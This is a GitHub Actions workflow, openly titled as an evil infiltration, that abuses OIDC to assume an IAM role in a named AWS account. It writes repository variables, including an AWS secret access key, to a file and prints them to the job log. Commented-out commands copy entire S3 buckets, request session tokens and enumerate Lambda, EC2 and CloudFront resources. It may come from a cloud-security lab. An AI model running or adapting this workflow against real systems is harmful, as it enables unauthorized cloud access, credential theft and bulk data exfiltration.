name: be-evil
run-name: ${{ github.actor }} is being super evil
on: [push]
permissions:
  id-token: write
jobs:
  infiltrate:
    runs-on: ubuntu-latest
    steps:
      - name: Infiltrate Corgi Muahahah
        uses: aws-actions/configure-aws-credentials@main
        with:
          role-to-assume: arn:aws:iam::373958419501:role/cicdRole
          aws-region: us-east-1 
      - name: Additional Steps...
        run: |
          echo '${{ vars.ENVIRONMENT }}' > secret.json
          echo '${{ vars.AWS_SECRET_ACCESS_KEY }}' >> secret.json
          cat secret.json
#          aws s3 ls s3://code9bab03acc99894ec --recursive
#          aws s3 cp s3://code9bab03acc99894ec --recursive
 #         echo hello
  #        aws s3 ls s3://platform-bucket-373958419501-us-east-1 --recursive
   #       aws s3 cp s3://platform-bucket-373958419501-us-east-1 --recursive
    #      echo hello
     #     aws s3 ls s3://site89d6e1f0ac68fa77 --recursive
      #    aws s3 cp s3://site89d6e1f0ac68fa77 --recursive
       #   echo hello
#          aws sts get-session-token
#          aws lambda list-functions
#          aws lambda get-function --function-name nslookupv2
#          aws lambda get-policy --function-name nslookupv2
#          aws lambda get-function-configuration --function-name nslookupv2
#          aws ec2 describe-instances
#          aws cloudfront list-distributions
#          aws s3 ls